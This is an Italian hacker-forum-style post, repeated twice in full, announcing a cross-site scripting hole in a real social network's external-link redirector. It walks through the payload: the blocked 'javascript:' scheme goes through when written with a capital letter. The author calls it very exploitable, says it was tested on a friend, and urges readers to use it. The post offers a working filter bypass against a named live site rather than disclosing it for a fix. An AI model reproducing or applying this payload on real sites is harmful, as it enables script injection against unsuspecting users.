xss trovata oggi pomeriggio in un momento di noia se è gia stata trovata perdono altrimenti rippatela e ownatevi
http://it.netlog.com/go/out/url=
Questo è il classico url esterno di netlog cioè
http://it.netlog.com/go/out/url=http://google.it
ovviamente ho pensato di provare la classica xss tramite url "javascript" quindi
http://it.netlog.com/go/out/url=javascript: alert(1)
però ho notato che veniva bloccato l'attacco...cosi' ho pensato di scrivere in maiuscolo una lettera
http://it.netlog.com/go/out/url=Javascript: alert(1)
voilàxss avvenuta.. ed è sfruttabilissima testato con un mio amico ^^
http://it.netlog.com/go/out/url=
Questo è il classico url esterno di netlog cioè
http://it.netlog.com/go/out/url=http://google.it
ovviamente ho pensato di provare la classica xss tramite url "javascript" quindi
http://it.netlog.com/go/out/url=javascript: alert(1)
però ho notato che veniva bloccato l'attacco...cosi' ho pensato di scrivere in maiuscolo una lettera
http://it.netlog.com/go/out/url=Javascript: alert(1)
voilàxss avvenuta.. ed è sfruttabilissima testato con un mio amico ^^